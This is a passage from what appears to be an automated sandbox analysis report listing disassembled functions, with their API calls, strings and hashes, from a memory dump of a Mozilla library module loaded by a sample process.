                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d37064385930b9ef091cddc060e560d7ccdee3275c32721c2d428252dafa6f44
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C1102B5814204AFCF006F64E949A5B77A5FB89329F04C228FD2997241DB39D886CBE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BA8D9DB), ref: 6BA8F2D2
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BA8F2F5
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BA8F386
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BA8F347
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BA8F3C8
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6BA8F3F3
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6BA8F3FC
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,00000000), ref: 6BA8F413
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                                                      • API String ID: 301460908-2227199552
                                                                                                                                                                                                                                      • Opcode ID: a285680ac68e10f4de1bb2a5d16994f326a0ec090ca2f7e1d586c1948b5b0eb6
                                                                                                                                                                                                                                      • Instruction ID: 20380f8b242cbf1748ed2d738a5838531b8857fceff69fb9d4fba0ac681c6c01
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a285680ac68e10f4de1bb2a5d16994f326a0ec090ca2f7e1d586c1948b5b0eb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C34121B1E043069BDF048F28D84179EB7B1EF85354F14882DD82AA7780FB3AE585C781
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(6BADF618), ref: 6BAB6A68
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6BAB6A7D
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6BAB6AA1
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF618), ref: 6BAB6AAE
                                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BAB6AE1
                                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BAB6B15
                                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6BAB6B65
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF618,?,?), ref: 6BAB6B83
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                                                                                                                                                                                      • String ID: SymInitialize
                                                                                                                                                                                                                                      • API String ID: 3103739362-3981310019
                                                                                                                                                                                                                                      • Opcode ID: 5020d0c8e4988374430976c848c3d9e30a622847b21ff5f582a2438ae3060648
                                                                                                                                                                                                                                      • Instruction ID: 81835c3b8e5037cddac7df7de6ec79b887753a0c8244975fcd9b4560dcc90916
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5020d0c8e4988374430976c848c3d9e30a622847b21ff5f582a2438ae3060648
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A418071608384AFDF01CF78C889B9A7BA8EF86304F08857DED598B282DB759545CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9DBE1
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9DBE9
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508
                                                                                                                                                                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BA9DC5D
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BA9DC7F
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: GetCurrentThreadId.KERNEL32 ref: 6BA99A95
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA99A9D
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA99ACC
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA99BA7
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BA99BB8
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BA99BC9
                                                                                                                                                                                                                                        • Part of subcall function 6BA9E8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BA9DCF5), ref: 6BA9E92D
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9DD1B
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9DD44
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9DD58
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BA9DBF2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
                                                                                                                                                                                                                                      • String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
                                                                                                                                                                                                                                      • API String ID: 3378208378-1387374313
                                                                                                                                                                                                                                      • Opcode ID: abeb617eb282d9f30c87b2b1fc37365c03d2ecd3d438c8272ae7f093f33741e2
                                                                                                                                                                                                                                      • Instruction ID: acd205b95fbc4eb45b63cfc85015e5f8c5bf5725c708c99b0f5e6854b8b0c0a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abeb617eb282d9f30c87b2b1fc37365c03d2ecd3d438c8272ae7f093f33741e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9281C0746407008FCF24EF29D495A6AB7E1FF89308B54892DD89787741EB38E9CACB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA0039
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAA0041
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA0075
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA0082
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000048), ref: 6BAA0090
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAA0104
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA011B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6BAA005B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                                                                                                      • API String ID: 3012294017-637075127
                                                                                                                                                                                                                                      • Opcode ID: 69adda8df0571970f765d69c4344690f4e172047dee26aa59725d7e85ca60431
                                                                                                                                                                                                                                      • Instruction ID: 9356c7f180dc2bda35f65a8d28b5186e03e5bb27dc77582a02f6cae669a68ae8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69adda8df0571970f765d69c4344690f4e172047dee26aa59725d7e85ca60431
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63418EB55043049FCF20DF24C941A9BBBF1FF89214F44851EE95A93740DB35E885CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,6BA73F47,?,?,?,6BA73F47,6BA71A70,?), ref: 6BA5207F
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000E5,6BA73F47,?,6BA73F47,6BA71A70,?), ref: 6BA520DD
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6BA73F47,6BA71A70,?), ref: 6BA5211A
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE744,?,6BA73F47,6BA71A70,?), ref: 6BA52145
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6BA73F47,6BA71A70,?), ref: 6BA521BA
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE744,?,6BA73F47,6BA71A70,?), ref: 6BA521E0
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE744,?,6BA73F47,6BA71A70,?), ref: 6BA52232
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                                                                                      • API String ID: 889484744-884734703
                                                                                                                                                                                                                                      • Opcode ID: f1635bba2d5f5023c20112c5fe8739bc594a8ad8b9185a816646538aff30e20b
                                                                                                                                                                                                                                      • Instruction ID: b3e24b82462220d6c97d1ad7b6d87c30e2325442307b9cf30a995d976e2c66b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1635bba2d5f5023c20112c5fe8739bc594a8ad8b9185a816646538aff30e20b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4661E232F0431A9FCF04CE68C985B6E77B2BF85314F194279E524A7684E7789E90CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6BA9483A,?), ref: 6BA54ACB
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6BA9483A,?), ref: 6BA54AE0
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(FFFE15BF,?,6BA9483A,?), ref: 6BA54A82
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: mozalloc_abort.MOZGLUE(?), ref: 6BA6CAA2
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6BA9483A,?), ref: 6BA54A97
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(15D4E801,?,6BA9483A,?), ref: 6BA54A35
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6BA9483A,?), ref: 6BA54A4A
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(15D4E824,?,6BA9483A,?), ref: 6BA54AF4
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(FFFE15E2,?,6BA9483A,?), ref: 6BA54B10
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(8E8E0022,?,6BA9483A,?), ref: 6BA54B2C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4251373892-0
                                                                                                                                                                                                                                      • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                                      • Instruction ID: 559e990a512a764fb6108e8fa261ba35201e739e81d5e5849dcf68630d189522
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4714AB2900646DFCB54CF79C5819AAB7F5FF18304B104A3ED15ACBA41EB35E6A5CB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAABB4
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BA64A63), ref: 6BAAABC0
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6BAAAC06
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAAC16
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAAC27
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6BAAAC66
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAAAD19
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BAAAD2B
                                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6BAAAD38
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2167474191-0
                                                                                                                                                                                                                                      • Opcode ID: b41508c1cdcf2f00512aa7c7937b446589a806e731621860f2178028e548b845
                                                                                                                                                                                                                                      • Instruction ID: 916a96cf5411f394c6a094ed11665ca529ebdbd6b765f02092e2805116d558aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b41508c1cdcf2f00512aa7c7937b446589a806e731621860f2178028e548b845
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5513474600B018FDB24CF25C58875ABBE6FF89714F604A2DD4AA87750EB34F885CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACB52
                                                                                                                                                                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACB82
                                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACB8D
                                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACBA4
                                                                                                                                                                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACBC4
                                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACBE9
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6BAACBFB
                                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACC20
                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6BAABCAE,?,?,6BA9DC2C), ref: 6BAACC65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2325513730-0
                                                                                                                                                                                                                                      • Opcode ID: 5f6dddcff03c669185e4400db4d1f2c46dbf26ac182fc8e18767c6364642f455
                                                                                                                                                                                                                                      • Instruction ID: 5364dc4c3bd0a13eb911f1a819c0608ff322b9dddcacf1f71d5aafff206bfc3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f6dddcff03c669185e4400db4d1f2c46dbf26ac182fc8e18767c6364642f455
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D341C430A003089FDF00DF65CC99A6E77B5EF89310F448069D51A9B391EB39ED82CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6BA5BC03
                                                                                                                                                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6BA5BD06
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                      • String ID: 0$0$y
                                                                                                                                                                                                                                      • API String ID: 2811501404-3020536412
                                                                                                                                                                                                                                      • Opcode ID: 68e7aa94a22f1a6ba49b85ccd573ba3476b2ea276ead14778af11fdb660a362b
